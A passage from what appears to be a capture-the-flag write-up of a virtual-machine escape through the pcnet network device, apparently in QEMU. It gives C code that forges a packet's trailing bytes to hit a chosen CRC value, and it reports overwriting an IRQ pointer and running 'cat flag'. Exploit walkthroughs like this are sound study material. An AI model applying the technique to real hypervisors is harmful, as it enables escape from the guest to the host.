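{
    if (crc_ready)
        return;
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (c >> 1) ^ UINT32_C(0xEDB88320) : c >> 1;
        crc_tab[i] = c;
        crc_rev[c >> 24] = (uint8_t)i;   /* top bytes are unique per index */
    }
    crc_ready = 1;
}

/* Feed n bytes into the CRC register, one table lookup per byte. */
uint32_t crc_bytes(uint32_t state, const uint8_t *p, size_t n)
{
    crc_init();
    while (n--)
        state = (state >> 8) ^ crc_tab[(state ^ *p++) & 0xff];
    return state;
}

/* Find 4 bytes that move the CRC register from `state` to `want`. */
void crc_forge(uint32_t state, uint32_t want, uint8_t out[4])
{
    uint8_t idx[4];

    crc_init();
    /* Backward pass: the top byte of each register value identifies the
     * table entry that was XORed in on that step. */
    for (int k = 3; k >= 0; k--) {
        idx[k] = crc_rev[want >> 24];
        want = (want ^ crc_tab[idx[k]]) << 8;
    }
    /* Forward pass: choose each byte so that the lookup hits that entry. */
    for (int k = 0; k < 4; k++) {
        out[k] = (uint8_t)((state ^ idx[k]) & 0xff);
        state = (state >> 8) ^ crc_tab[idx[k]];
    }
}
```

Because pcnet_receive stores `htonl(fcs)`, on a little-endian host the register value to aim for would be the byte-swapped targetValue rather than targetValue itself. With `state` being the CRC of the first 4092 bytes, `crc_forge(state, want, last4)` yields the four trailing bytes of the packet.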

As we can see, fake_irq has been written into memory.

The command cat flag is executed.
